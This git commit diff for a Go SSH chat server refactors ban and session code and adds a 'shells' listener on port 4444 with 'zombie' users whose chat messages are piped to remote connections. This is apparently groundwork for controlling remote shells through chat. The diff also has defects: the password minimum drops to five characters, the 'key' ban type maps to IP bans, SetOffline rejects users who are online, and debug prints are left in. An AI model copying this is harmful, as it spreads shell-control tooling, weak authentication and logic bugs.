nice
This commit is contained in:
parent
f51786487b
commit
729c3aee50
|
@ -203,10 +203,10 @@ func (a *Auth) BanClient(client string, d time.Duration) {
|
|||
} else {
|
||||
a.bannedClient.Set(item)
|
||||
}
|
||||
log.Debug().Msgf("Banned: %q (for %s)", item.Key(), d)
|
||||
log.Debug().Msgf("BanList: %q (for %s)", item.Key(), d)
|
||||
}
|
||||
|
||||
// Banned returns the list of banned keys.
|
||||
// BanList returns the list of banned keys.
|
||||
func (a *Auth) Banned() (ip []string, fingerprint []string, client []string) {
|
||||
a.banned.Each(func(key string, _ set.Item) error {
|
||||
fingerprint = append(fingerprint, key)
|
||||
|
|
85
auth/bans.go
85
auth/bans.go
|
@ -1,7 +1,6 @@
|
|||
package auth
|
||||
|
||||
import (
|
||||
"encoding/binary"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"net"
|
||||
|
@ -12,6 +11,8 @@ import (
|
|||
"golang.org/x/crypto/ssh"
|
||||
)
|
||||
|
||||
type BanType uint32
|
||||
|
||||
const (
|
||||
Client BanType = iota
|
||||
Name
|
||||
|
@ -21,9 +22,8 @@ const (
|
|||
|
||||
var banCache *cache.Cache
|
||||
|
||||
|
||||
type banned struct {
|
||||
items []string
|
||||
type BanList struct {
|
||||
Items []string
|
||||
}
|
||||
|
||||
func init() {
|
||||
|
@ -39,10 +39,40 @@ func (users *UserDB) BanQuery(query string) (err error) {
|
|||
err = users.BanOther(request[1], Name)
|
||||
case "ip":
|
||||
err = users.BanOther(request[1], IP)
|
||||
case "key":
|
||||
err = users.BanOther(request[1], IP)
|
||||
default:
|
||||
return errors.New("unknown key")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func (users *UserDB) Banned() ([]string, []string, []string, []string) {
|
||||
users.mu.RLock()
|
||||
defer users.mu.RUnlock()
|
||||
names := users.banned(Name)
|
||||
ips := users.banned(IP)
|
||||
fprints := users.banned(Key)
|
||||
clients := users.banned(Client)
|
||||
return names, ips, fprints, clients
|
||||
}
|
||||
|
||||
func (users *UserDB) banned(bantype BanType) []string {
|
||||
var banned = new(BanList)
|
||||
var bans = uint32ToBytes(uint32(bantype))
|
||||
|
||||
banbytes, err := users.DB.Get(bans)
|
||||
if err != nil {
|
||||
log.Debug().Err(err).Uint16("type", uint16(bantype)).Msg("failed to get bans")
|
||||
return []string{}
|
||||
}
|
||||
err = json.Unmarshal(banbytes, &banned)
|
||||
if err != nil {
|
||||
log.Error().Caller().Err(err).Uint16("type", uint16(bantype)).Msg("failed to unmarshal")
|
||||
}
|
||||
return banned.Items
|
||||
}
|
||||
|
||||
// CheckBans checks our ban list for the instance of any of the given elements.
|
||||
func (users *UserDB) CheckBans(user string, addr net.Addr, key ssh.PublicKey, s string) error {
|
||||
var (
|
||||
|
@ -94,17 +124,15 @@ func (users *UserDB) CheckBans(user string, addr net.Addr, key ssh.PublicKey, s
|
|||
return nil
|
||||
}
|
||||
|
||||
type BanType uint16
|
||||
|
||||
func (users *UserDB) BanOther(target string, bantype BanType) error {
|
||||
bans := make([]byte, 4)
|
||||
binary.LittleEndian.PutUint16(bans, uint16(bantype))
|
||||
bans := uint32ToBytes(uint32(bantype))
|
||||
bad := &BanList{Items: []string{}}
|
||||
|
||||
bad := &banned{items: []string{}}
|
||||
defer func() {
|
||||
print("yeet")
|
||||
}()
|
||||
|
||||
if !users.DB.Has(bans) {
|
||||
bad.items = []string{target}
|
||||
} else {
|
||||
if users.DB.Has(bans) {
|
||||
badBytes, err := users.DB.Get(bans)
|
||||
if err != nil {
|
||||
return err
|
||||
|
@ -112,20 +140,36 @@ func (users *UserDB) BanOther(target string, bantype BanType) error {
|
|||
if err := json.Unmarshal(badBytes, &bad); err != nil {
|
||||
return err
|
||||
}
|
||||
for _, b := range bad.Items {
|
||||
print(".")
|
||||
if b == target {
|
||||
return errors.New("already banned: " + target)
|
||||
}
|
||||
}
|
||||
}
|
||||
bad.items = append(bad.items, target)
|
||||
|
||||
bad.Items = append(bad.Items, target)
|
||||
newbads, err := json.Marshal(bad)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return users.DB.Put(bans, newbads)
|
||||
}
|
||||
|
||||
func (users *UserDB) CheckBanOther(target string, bantype BanType) bool {
|
||||
bans := make([]byte, 4)
|
||||
binary.LittleEndian.PutUint16(bans, uint16(bantype))
|
||||
bans := uint32ToBytes(uint32(bantype))
|
||||
|
||||
bad := &banned{items: []string{}}
|
||||
if bantype == IP {
|
||||
ip, _, err := net.SplitHostPort(target)
|
||||
if err != nil {
|
||||
target = target
|
||||
} else {
|
||||
target = ip
|
||||
}
|
||||
}
|
||||
|
||||
bad := &BanList{Items: []string{}}
|
||||
|
||||
if !users.DB.Has(bans) {
|
||||
return false
|
||||
|
@ -133,16 +177,16 @@ func (users *UserDB) CheckBanOther(target string, bantype BanType) bool {
|
|||
|
||||
badBytes, err := users.DB.Get(bans)
|
||||
if err != nil {
|
||||
log.Error().Err(err).Uint16("bantype", uint16(bantype)).Msg("failed to load bans!!")
|
||||
log.Error().Err(err).Uint32("bantype", uint32(bantype)).Msg("failed to load bans!!")
|
||||
// ban anyway for safety
|
||||
return true
|
||||
}
|
||||
if err := json.Unmarshal(badBytes, bad); err != nil {
|
||||
log.Error().Err(err).Uint16("bantype", uint16(bantype)).Msg("failed to load bans!!")
|
||||
log.Error().Err(err).Uint32("bantype", uint32(bantype)).Msg("failed to load bans!!")
|
||||
return true
|
||||
}
|
||||
|
||||
for _, banned := range bad.items {
|
||||
for _, banned := range bad.Items {
|
||||
if banned == target {
|
||||
return true
|
||||
}
|
||||
|
@ -157,9 +201,8 @@ func (users *UserDB) Ban(username string) error {
|
|||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if err := users.SetPrivLevel(user, Banned); err != nil {
|
||||
if err := users.SetPrivLevel(user, LevelBanned); err != nil {
|
||||
return err
|
||||
}
|
||||
_ = users.Sessions.SetOffline(user)
|
||||
return nil
|
||||
}
|
||||
|
|
|
@ -102,10 +102,21 @@ func NewUserDB(path string) (db *UserDB, err error) {
|
|||
return
|
||||
}
|
||||
|
||||
func uint32ToBytes(ui uint32) []byte {
|
||||
buf := make([]byte, 4)
|
||||
binary.LittleEndian.PutUint32(buf, ui)
|
||||
return buf
|
||||
}
|
||||
|
||||
func (users *UserDB) getNewID() uint32 {
|
||||
users.mu.Lock()
|
||||
defer users.mu.Unlock()
|
||||
return uint32(users.DB.Len() + 1)
|
||||
newid := uint32(10 + users.DB.Len())
|
||||
for users.DB.Has(uint32ToBytes(newid)) {
|
||||
// we choose the 10 offset because we store bans in the earlier ID spaces
|
||||
newid = uint32(10 + users.DB.Len())
|
||||
}
|
||||
return newid
|
||||
}
|
||||
|
||||
// Register registers a new user into our database.
|
||||
|
@ -115,16 +126,14 @@ func (users *UserDB) Register(user, pass string) (*RegisteredUser, error) {
|
|||
if users.UserExists(user) {
|
||||
return nil, errors.New("username already exists: " + user)
|
||||
}
|
||||
if len(pass) < 8 {
|
||||
return nil, errors.New("password is too short")
|
||||
if len(pass) < 5 {
|
||||
return nil, errors.New("password must be at least 5 characters")
|
||||
}
|
||||
u := &RegisteredUser{ID: users.getNewID(), Username: user, Hash: HashPassword(pass), Privs: Chatter}
|
||||
if ubytes, err = json.Marshal(u); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
buf := make([]byte, 4)
|
||||
binary.LittleEndian.PutUint32(buf, u.ID)
|
||||
err = users.DB.Put(buf, ubytes)
|
||||
err = users.DB.Put(uint32ToBytes(u.ID), ubytes)
|
||||
return u, err
|
||||
}
|
||||
|
||||
|
@ -135,8 +144,6 @@ func (users *UserDB) AssignPublicKeyToUser(user *RegisteredUser, key ssh.PublicK
|
|||
return users.Sync(user)
|
||||
}
|
||||
|
||||
|
||||
|
||||
// Delete removes a user from our database.
|
||||
func (users *UserDB) Delete(user string) error {
|
||||
users.mu.Lock()
|
||||
|
@ -145,7 +152,6 @@ func (users *UserDB) Delete(user string) error {
|
|||
if err != nil {
|
||||
return err
|
||||
}
|
||||
_ = users.Sessions.SetOffline(u)
|
||||
buf := make([]byte, 4)
|
||||
binary.LittleEndian.PutUint32(buf, u.ID)
|
||||
return users.DB.Delete(buf)
|
||||
|
@ -237,7 +243,7 @@ func (users *UserDB) GetUser(user string) (usr *RegisteredUser, err error) {
|
|||
return usr, nil
|
||||
}
|
||||
}
|
||||
return nil, errors.New("user does not exist")
|
||||
return nil, errors.New("user does not exist: " + user)
|
||||
}
|
||||
|
||||
// KeyExists iterates through all RegisteredUser instances in the database and returns the corresponding RegisteredUser and true if a public key is present.
|
||||
|
|
|
@ -4,8 +4,8 @@ package auth
|
|||
type PrivLevel uint32
|
||||
|
||||
const (
|
||||
// Banned represents a user that is forbidden to login.
|
||||
Banned PrivLevel = iota
|
||||
// LevelBanned represents a user that is forbidden to login.
|
||||
LevelBanned PrivLevel = iota
|
||||
// Chatter represents a normal user.
|
||||
Chatter
|
||||
// Operator represents a moderator with extra privileges.
|
||||
|
|
|
@ -38,24 +38,43 @@ func (sesh *SessionManager) IsOnline(username string) (u *RegisteredUser, ok boo
|
|||
}
|
||||
|
||||
// SetOnline adds the given user to our active sessions map.
|
||||
func (sesh *SessionManager) SetOnline(msguser *message.User, user *RegisteredUser) error {
|
||||
func (sesh *SessionManager) SetOnline(msguser *message.User) error {
|
||||
sesh.mu.Lock()
|
||||
defer sesh.mu.Unlock()
|
||||
if _, ok := sesh.Online[user]; ok {
|
||||
return errors.New("already logged in: " + user.Username)
|
||||
|
||||
var u *RegisteredUser
|
||||
var err error
|
||||
if u, err = sesh.userdb.GetUser(msguser.Name()); err != nil {
|
||||
return err
|
||||
}
|
||||
sesh.Online[user] = msguser
|
||||
if _, ok := sesh.Online[u]; ok {
|
||||
return errors.New("already logged in: " + u.Username)
|
||||
}
|
||||
|
||||
sesh.Online[u] = msguser
|
||||
log.Debug().Msgf("added to session: %s", u.Username)
|
||||
return nil
|
||||
}
|
||||
|
||||
// SetOffline removes the given user to our active sessions map and closes their connection.
|
||||
func (sesh *SessionManager) SetOffline(user *RegisteredUser) error {
|
||||
func (sesh *SessionManager) SetOffline(msguser *message.User) error {
|
||||
sesh.mu.Lock()
|
||||
defer sesh.mu.Unlock()
|
||||
if _, ok := sesh.Online[user]; !ok {
|
||||
return errors.New("not logged in: " + user.Username)
|
||||
|
||||
var u *RegisteredUser
|
||||
var err error
|
||||
if u, err = sesh.userdb.GetUser(msguser.Name()); err != nil {
|
||||
return err
|
||||
}
|
||||
sesh.Online[user].Close()
|
||||
delete(sesh.Online, user)
|
||||
if _, ok := sesh.Online[u]; ok {
|
||||
return errors.New("already logged in: " + u.Username)
|
||||
}
|
||||
|
||||
if _, ok := sesh.Online[u]; !ok {
|
||||
return errors.New("not logged in: " + u.Username)
|
||||
}
|
||||
sesh.Online[u].Close()
|
||||
delete(sesh.Online, u)
|
||||
log.Debug().Msgf("removed from session: %s", u.Username)
|
||||
return nil
|
||||
}
|
||||
|
|
20
auth/ssh.go
20
auth/ssh.go
|
@ -11,17 +11,23 @@ import (
|
|||
)
|
||||
|
||||
func (users *UserDB) keyboardInteractive(conn ssh.ConnMetadata, challenge ssh.KeyboardInteractiveChallenge) (*ssh.Permissions, error) {
|
||||
client := sanitize.Data(string(conn.ClientVersion()), 64)
|
||||
slog := log.With().
|
||||
Str("caller", conn.RemoteAddr().String()).
|
||||
Str("client", client).Str("user", conn.User()).Logger()
|
||||
|
||||
var err error
|
||||
if users.AcceptPassphrase() {
|
||||
var answers []string
|
||||
answers, err = challenge("", "", []string{"Username: ", "Password: "}, []bool{true, false})
|
||||
answers, err = challenge("", "", []string{"Password: "}, []bool{false})
|
||||
if err == nil {
|
||||
if len(answers) != 2 {
|
||||
if len(answers) != 1 {
|
||||
err = errors.New("missing input")
|
||||
} else {
|
||||
err = users.PassphraseLogin(answers[0], answers[1])
|
||||
err = users.PassphraseLogin(conn.User(), answers[0])
|
||||
if err != nil {
|
||||
log.Warn().Err(err).Str("caller", conn.RemoteAddr().String()).Msg("password auth failure")
|
||||
slog.Warn().Err(err).Msg("password auth failure")
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -29,11 +35,13 @@ func (users *UserDB) keyboardInteractive(conn ssh.ConnMetadata, challenge ssh.Ke
|
|||
err = errors.New("public key authentication required")
|
||||
}
|
||||
|
||||
err = users.CheckBans(sanitize.Data(conn.User(), 32), conn.RemoteAddr(), nil, sanitize.Data(string(conn.ClientVersion()), 64))
|
||||
err = users.CheckBans(conn.User(), conn.RemoteAddr(), nil, client)
|
||||
if err != nil {
|
||||
slog.Warn().Msg(err.Error())
|
||||
return nil, err
|
||||
}
|
||||
log.Debug().Str("caller", conn.RemoteAddr().String()).Bytes("client", conn.ClientVersion()).Msg("not banned")
|
||||
|
||||
slog.Debug().Msg("not banned")
|
||||
|
||||
return nil, err
|
||||
}
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
/*
|
||||
`chat` package is a server-agnostic implementation of a chat interface, built
|
||||
to be used as the backend for ssh-chat.
|
||||
to be used as the backend for sh3lly.
|
||||
|
||||
This package should not know anything about sockets. It should expose io-style
|
||||
interfaces and rooms for communicating with any method of transnport.
|
||||
|
|
|
@ -7,6 +7,8 @@ type Identifier interface {
|
|||
Name() string
|
||||
}
|
||||
|
||||
|
||||
|
||||
// SimpleID is a simple Identifier implementation used for testing.
|
||||
type SimpleID string
|
||||
|
||||
|
|
|
@ -5,7 +5,9 @@ import (
|
|||
"fmt"
|
||||
"io"
|
||||
"math/rand"
|
||||
"net"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
|
@ -35,6 +37,8 @@ type User struct {
|
|||
screen io.WriteCloser
|
||||
closeOnce sync.Once
|
||||
|
||||
ZombiePipe chan string
|
||||
|
||||
mu *sync.Mutex
|
||||
config UserConfig
|
||||
replyTo *User // Set when user gets a /msg, for replying.
|
||||
|
@ -53,6 +57,8 @@ func NewUser(identity Identifier) *User {
|
|||
Ignored: set.New(),
|
||||
Focused: set.New(),
|
||||
mu: &sync.Mutex{},
|
||||
|
||||
ZombiePipe: make(chan string, 5),
|
||||
}
|
||||
u.setColorIdx(rand.Int())
|
||||
|
||||
|
@ -88,6 +94,13 @@ func (u *User) SetAway(msg string) {
|
|||
}
|
||||
}
|
||||
|
||||
// SetGroup sets the users ZombieGrp group (for shells).
|
||||
func (u *User) SetGroup(grp string) {
|
||||
u.mu.Lock()
|
||||
defer u.mu.Unlock()
|
||||
u.config.ZombieGrp=grp
|
||||
}
|
||||
|
||||
// GetAway returns if the user is away, when they went away, and the reason.
|
||||
func (u *User) GetAway() (bool, time.Time, string) {
|
||||
u.mu.Lock()
|
||||
|
@ -239,9 +252,9 @@ func (u *User) render(m Message) string {
|
|||
return out + Newline
|
||||
}
|
||||
|
||||
// writeMsg renders the message and attempts to write it, will Close the user
|
||||
// WriteMsg renders the message and attempts to write it, will Close the user
|
||||
// if it fails.
|
||||
func (u *User) writeMsg(m Message) error {
|
||||
func (u *User) WriteMsg(m Message) error {
|
||||
r := u.render(m)
|
||||
_, err := u.screen.Write([]byte(r))
|
||||
if err != nil {
|
||||
|
@ -253,7 +266,11 @@ func (u *User) writeMsg(m Message) error {
|
|||
|
||||
// HandleMsg will render the message to the screen, blocking.
|
||||
func (u *User) HandleMsg(m Message) error {
|
||||
return u.writeMsg(m)
|
||||
if u.config.Zombie {
|
||||
u.ZombiePipe <- strings.SplitN(m.String(), ":", 2)[1]
|
||||
return nil
|
||||
}
|
||||
return u.WriteMsg(m)
|
||||
}
|
||||
|
||||
// Send adds message to consume by user
|
||||
|
@ -272,9 +289,14 @@ func (u *User) Send(m Message) error {
|
|||
|
||||
// UserConfig is a container for per-user configurations.
|
||||
type UserConfig struct {
|
||||
Highlight *regexp.Regexp
|
||||
Bell bool
|
||||
Quiet bool
|
||||
Highlight *regexp.Regexp
|
||||
Bell bool
|
||||
Quiet bool
|
||||
|
||||
Zombie bool
|
||||
ZombieGrp string
|
||||
ZombieConn net.Conn
|
||||
|
||||
Echo bool // Echo shows your own messages after sending, disabled for bots
|
||||
Timeformat *string
|
||||
Timezone *time.Location
|
||||
|
@ -286,9 +308,10 @@ var DefaultUserConfig UserConfig
|
|||
|
||||
func init() {
|
||||
DefaultUserConfig = UserConfig{
|
||||
Bell: true,
|
||||
Echo: true,
|
||||
Quiet: false,
|
||||
Bell: true,
|
||||
Echo: true,
|
||||
Quiet: false,
|
||||
Zombie: false,
|
||||
}
|
||||
|
||||
// TODO: Seed random?
|
||||
|
|
29
chat/room.go
29
chat/room.go
|
@ -14,6 +14,21 @@ import (
|
|||
const historyLen = 20
|
||||
const roomBuffer = 10
|
||||
|
||||
var ExternalAnnouncements chan *message.AnnounceMsg
|
||||
var ExternalMessages chan message.PublicMsg
|
||||
var MainRoom *Room
|
||||
|
||||
func listenExternal(room *Room) {
|
||||
for {
|
||||
select {
|
||||
case ext := <-ExternalAnnouncements:
|
||||
room.Send(ext)
|
||||
case ext := <-ExternalMessages:
|
||||
room.Send(ext)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ErrRoomClosed is the error returned when a message is sent to a room that is already
|
||||
// closed.
|
||||
var ErrRoomClosed = errors.New("room closed")
|
||||
|
@ -53,6 +68,8 @@ type Room struct {
|
|||
closed bool
|
||||
closeOnce sync.Once
|
||||
|
||||
external chan *message.AnnounceMsg
|
||||
|
||||
Members *set.Set
|
||||
}
|
||||
|
||||
|
@ -60,12 +77,19 @@ type Room struct {
|
|||
func NewRoom() *Room {
|
||||
broadcast := make(chan message.Message, roomBuffer)
|
||||
|
||||
return &Room{
|
||||
r := &Room{
|
||||
broadcast: broadcast,
|
||||
commands: *defaultCommands,
|
||||
|
||||
Members: set.New(),
|
||||
external: make(chan *message.AnnounceMsg, 5),
|
||||
Members: set.New(),
|
||||
}
|
||||
|
||||
MainRoom = r
|
||||
ExternalAnnouncements = r.external
|
||||
go listenExternal(r)
|
||||
|
||||
return r
|
||||
}
|
||||
|
||||
// SetCommands sets the room's command handlers.
|
||||
|
@ -180,6 +204,7 @@ func (r *Room) Leave(u *message.User) error {
|
|||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
s := fmt.Sprintf("%s left. (After %s)", u.Name(), humantime.Since(u.Joined()))
|
||||
r.Send(message.NewAnnounceMsg(s))
|
||||
return nil
|
||||
|
|
|
@ -16,6 +16,7 @@ import (
|
|||
"git.tcp.direct/kayos/teletypewriter/chat/message"
|
||||
"git.tcp.direct/kayos/teletypewriter/config"
|
||||
"git.tcp.direct/kayos/teletypewriter/host"
|
||||
"git.tcp.direct/kayos/teletypewriter/shells"
|
||||
"git.tcp.direct/kayos/teletypewriter/sshd"
|
||||
)
|
||||
|
||||
|
@ -34,6 +35,8 @@ func init() {
|
|||
}
|
||||
|
||||
checkArgs()
|
||||
|
||||
shells.Start()
|
||||
}
|
||||
|
||||
func confirm() bool {
|
||||
|
@ -141,24 +144,13 @@ func main() {
|
|||
defer s.Close()
|
||||
// s.RateLimit = sshd.NewInputLimiter
|
||||
|
||||
fmt.Printf("Listening for connections on %v\n", s.Addr().String())
|
||||
fmt.Printf("Listening for SSH connections on %v\n", s.Addr().String())
|
||||
|
||||
HostServer := host.NewHost(s, authdb)
|
||||
HostServer.SetTheme(message.Themes[0])
|
||||
// TODO: replace with config string
|
||||
HostServer.Version = config.SSHVersion
|
||||
|
||||
HostServer.OnUserJoined = func(msgusr *message.User) {
|
||||
var u *auth.RegisteredUser
|
||||
var err error
|
||||
if u, err = authdb.GetUser(msgusr.Name()); err != nil {
|
||||
return
|
||||
}
|
||||
if err := authdb.Sessions.SetOnline(msgusr, u); err != nil {
|
||||
log.Debug().Err(err).Msg("session error")
|
||||
}
|
||||
}
|
||||
|
||||
/* var motd = false
|
||||
if motd {
|
||||
HostServer.GetMOTD = func() (string, error) {
|
||||
|
@ -188,4 +180,5 @@ func main() {
|
|||
|
||||
<-sig // Wait for ^C signal
|
||||
fmt.Fprintln(os.Stderr, "Interrupt signal detected, shutting down.")
|
||||
authdb.DB.Sync()
|
||||
}
|
|
@ -79,7 +79,7 @@ func Init() {
|
|||
|
||||
func setDefaults() {
|
||||
var (
|
||||
configSections = []string{"logger", "ssh", "database"}
|
||||
configSections = []string{"logger", "ssh", "database", "shells"}
|
||||
deflogdir = "./logs/"
|
||||
defNoColor = false
|
||||
)
|
||||
|
@ -106,6 +106,11 @@ func setDefaults() {
|
|||
"server_version": "tcp.direct",
|
||||
}
|
||||
|
||||
Opt["shells"] = map[string]interface{}{
|
||||
"bind_addr": "192.168.69.5",
|
||||
"bind_port": 4444,
|
||||
}
|
||||
|
||||
Opt["database"] = map[string]interface{}{
|
||||
"datapath": "./data",
|
||||
}
|
||||
|
@ -191,6 +196,7 @@ func processOpts() {
|
|||
"ssh.bind_addr": &BindAddr,
|
||||
"ssh.key_path": &KeyPath,
|
||||
"ssh.server_version": &SSHVersion,
|
||||
"shells.bind_addr": &ShellAddr,
|
||||
"logger.directory": &LogDir,
|
||||
"database.datapath": &DataPath,
|
||||
}
|
||||
|
@ -204,6 +210,7 @@ func processOpts() {
|
|||
|
||||
intOpt := map[string]*int{
|
||||
"ssh.bind_port": &BindPort,
|
||||
"shells.bind_port": &ShellPort,
|
||||
}
|
||||
|
||||
for key, opt := range stringOpt {
|
||||
|
|
|
@ -26,15 +26,18 @@ var (
|
|||
BindAddr string
|
||||
// BindPort is defined via our toml configuration file. It is the port that we listen on.
|
||||
BindPort int
|
||||
|
||||
AllowAnon bool
|
||||
|
||||
// KeyPath is where we store our RSA keys for the SSH server
|
||||
KeyPath string
|
||||
|
||||
SSHVersion string
|
||||
)
|
||||
|
||||
// "shells"
|
||||
var (
|
||||
ShellPort int
|
||||
ShellAddr string
|
||||
)
|
||||
|
||||
var (
|
||||
// Filename returns the current location of our toml config file.
|
||||
Filename string
|
||||
|
|
209
host/host.go
209
host/host.go
|
@ -1,6 +1,7 @@
|
|||
package host
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
|
@ -59,6 +60,7 @@ type Host struct {
|
|||
|
||||
// NewHost creates a Host on top of an existing listener.
|
||||
func NewHost(listener *sshd.SSHListener, auth *auth.UserDB) *Host {
|
||||
|
||||
room := chat.NewRoom()
|
||||
h := &Host{
|
||||
Room: room,
|
||||
|
@ -146,7 +148,7 @@ func (h *Host) Connect(term *sshd.Terminal) {
|
|||
|
||||
member, err := h.Join(user)
|
||||
if err != nil {
|
||||
id.SetName(fmt.Sprintf("%s%d",id.Name(), count))
|
||||
id.SetName(fmt.Sprintf("%s%d", id.Name(), count))
|
||||
member, err = h.Join(user)
|
||||
}
|
||||
if err != nil {
|
||||
|
@ -429,6 +431,11 @@ func (h *Host) InitCommands(c *chat.Commands) {
|
|||
if !ok {
|
||||
return errors.New("user not found")
|
||||
}
|
||||
if target.Config().Zombie {
|
||||
whois := "SHELL: "+target.Config().ZombieConn.RemoteAddr().String()
|
||||
room.Send(message.NewSystemMsg(whois, msg.From()))
|
||||
return nil
|
||||
}
|
||||
id := target.Identifier.(*identity.Identity)
|
||||
var whois string
|
||||
switch room.IsOp(msg.From()) {
|
||||
|
@ -489,116 +496,112 @@ func (h *Host) InitCommands(c *chat.Commands) {
|
|||
},
|
||||
})
|
||||
|
||||
c.Add(chat.Command{
|
||||
Op: true,
|
||||
Prefix: "/ban",
|
||||
PrefixHelp: "QUERY [DURATION]",
|
||||
Help: "Ban from the server. QUERY can be a username to ban the fingerprint and ip, or quoted \"key=value\" pairs with keys like ip, fingerprint, client.",
|
||||
Handler: func(room *chat.Room, msg message.CommandMsg) error {
|
||||
// TODO: Would be nice to specify what to ban. Key? Ip? etc.
|
||||
if !room.IsOp(msg.From()) {
|
||||
return errors.New("must be op")
|
||||
}
|
||||
c.Add(chat.Command{
|
||||
Op: true,
|
||||
Prefix: "/ban",
|
||||
PrefixHelp: "QUERY [DURATION]",
|
||||
Help: "Ban from the server. QUERY can be a username to ban the fingerprint and ip, or quoted \"key=value\" pairs with keys like ip, fingerprint, client.",
|
||||
Handler: func(room *chat.Room, msg message.CommandMsg) error {
|
||||
// TODO: Would be nice to specify what to ban. Key? Ip? etc.
|
||||
if !room.IsOp(msg.From()) {
|
||||
return errors.New("must be op")
|
||||
}
|
||||
|
||||
args := msg.Args()
|
||||
if len(args) == 0 {
|
||||
return errors.New("must specify user")
|
||||
}
|
||||
args := msg.Args()
|
||||
if len(args) == 0 {
|
||||
return errors.New("must specify user")
|
||||
}
|
||||
|
||||
query := args[0]
|
||||
target, ok := h.GetUser(query)
|
||||
if !ok {
|
||||
query = strings.Join(args, " ")
|
||||
if strings.Contains(query, "=") {
|
||||
return h.auth.BanQuery(query)
|
||||
}
|
||||
return errors.New("user not found")
|
||||
query := args[0]
|
||||
target, ok := h.GetUser(query)
|
||||
if !ok {
|
||||
query = strings.Join(args, " ")
|
||||
if strings.Contains(query, "=") {
|
||||
return h.auth.BanQuery(query)
|
||||
}
|
||||
return errors.New("user not found")
|
||||
}
|
||||
|
||||
id := target.Identifier.ID()
|
||||
if err := h.auth.Ban(id); err != nil {
|
||||
id := target.Identifier.ID()
|
||||
if err := h.auth.Ban(id); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
body := fmt.Sprintf("%s was banned by %s.", target.Name(), msg.From().Name())
|
||||
room.Send(message.NewAnnounceMsg(body))
|
||||
target.Close()
|
||||
|
||||
log.Debug().Msgf("BanList: \n-> %s", id)
|
||||
|
||||
return nil
|
||||
},
|
||||
})
|
||||
|
||||
c.Add(chat.Command{
|
||||
Op: true,
|
||||
Prefix: "/banned",
|
||||
Help: "List the current ban conditions.",
|
||||
Handler: func(room *chat.Room, msg message.CommandMsg) error {
|
||||
if !room.IsOp(msg.From()) {
|
||||
return errors.New("must be op")
|
||||
}
|
||||
|
||||
bannedNames, bannedIPs, bannedFingerprints, bannedClients := h.auth.Banned()
|
||||
var cat = map[string][]string{"name": bannedNames, "ip": bannedIPs, "client": bannedClients, "fingerprint": bannedFingerprints}
|
||||
|
||||
buf := bytes.Buffer{}
|
||||
fmt.Fprintf(&buf, "BanList:")
|
||||
for label, keys := range cat {
|
||||
for _, key := range keys {
|
||||
fmt.Fprintf(&buf, "\n \"%s=%s\"", label, key)
|
||||
}
|
||||
}
|
||||
room.Send(message.NewSystemMsg(buf.String(), msg.From()))
|
||||
|
||||
return nil
|
||||
},
|
||||
})
|
||||
|
||||
c.Add(chat.Command{
|
||||
Op: true,
|
||||
Prefix: "/motd",
|
||||
PrefixHelp: "[MESSAGE]",
|
||||
Help: "Set a new MESSAGE of the day, or print the motd if no MESSAGE.",
|
||||
Handler: func(room *chat.Room, msg message.CommandMsg) error {
|
||||
args := msg.Args()
|
||||
user := msg.From()
|
||||
|
||||
h.mu.Lock()
|
||||
motd := h.motd
|
||||
h.mu.Unlock()
|
||||
|
||||
if len(args) == 0 {
|
||||
room.Send(message.NewSystemMsg(motd, user))
|
||||
return nil
|
||||
}
|
||||
if !room.IsOp(user) {
|
||||
return errors.New("must be OP to modify the MOTD")
|
||||
}
|
||||
|
||||
var err error
|
||||
var s string = strings.Join(args, " ")
|
||||
|
||||
if s == "@" {
|
||||
if h.GetMOTD == nil {
|
||||
return errors.New("motd reload not set")
|
||||
}
|
||||
if s, err = h.GetMOTD(); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
body := fmt.Sprintf("%s was banned by %s.", target.Name(), msg.From().Name())
|
||||
room.Send(message.NewAnnounceMsg(body))
|
||||
target.Close()
|
||||
h.SetMotd(s)
|
||||
fromMsg := fmt.Sprintf("New message of the day set by %s:", msg.From().Name())
|
||||
room.Send(message.NewAnnounceMsg(fromMsg + message.Newline + "-> " + s))
|
||||
|
||||
log.Debug().Msgf("Banned: \n-> %s", id)
|
||||
|
||||
return nil
|
||||
},
|
||||
})
|
||||
|
||||
/* c.Add(chat.Command{
|
||||
Op: true,
|
||||
Prefix: "/banned",
|
||||
Help: "List the current ban conditions.",
|
||||
Handler: func(room *chat.Room, msg message.CommandMsg) error {
|
||||
if !room.IsOp(msg.From()) {
|
||||
return errors.New("must be op")
|
||||
}
|
||||
|
||||
bannedIPs, bannedFingerprints, bannedClients := h.auth.Banned()
|
||||
|
||||
buf := bytes.Buffer{}
|
||||
fmt.Fprintf(&buf, "Banned:")
|
||||
for _, key := range bannedIPs {
|
||||
fmt.Fprintf(&buf, "\n \"ip=%s\"", key)
|
||||
}
|
||||
for _, key := range bannedFingerprints {
|
||||
fmt.Fprintf(&buf, "\n \"fingerprint=%s\"", key)
|
||||
}
|
||||
for _, key := range bannedClients {
|
||||
fmt.Fprintf(&buf, "\n \"client=%s\"", key)
|
||||
}
|
||||
|
||||
room.Send(message.NewSystemMsg(buf.String(), msg.From()))
|
||||
|
||||
return nil
|
||||
},
|
||||
})
|
||||
|
||||
c.Add(chat.Command{
|
||||
Op: true,
|
||||
Prefix: "/motd",
|
||||
PrefixHelp: "[MESSAGE]",
|
||||
Help: "Set a new MESSAGE of the day, or print the motd if no MESSAGE.",
|
||||
Handler: func(room *chat.Room, msg message.CommandMsg) error {
|
||||
args := msg.Args()
|
||||
user := msg.From()
|
||||
|
||||
h.mu.Lock()
|
||||
motd := h.motd
|
||||
h.mu.Unlock()
|
||||
|
||||
if len(args) == 0 {
|
||||
room.Send(message.NewSystemMsg(motd, user))
|
||||
return nil
|
||||
}
|
||||
if !room.IsOp(user) {
|
||||
return errors.New("must be OP to modify the MOTD")
|
||||
}
|
||||
|
||||
var err error
|
||||
var s string = strings.Join(args, " ")
|
||||
|
||||
if s == "@" {
|
||||
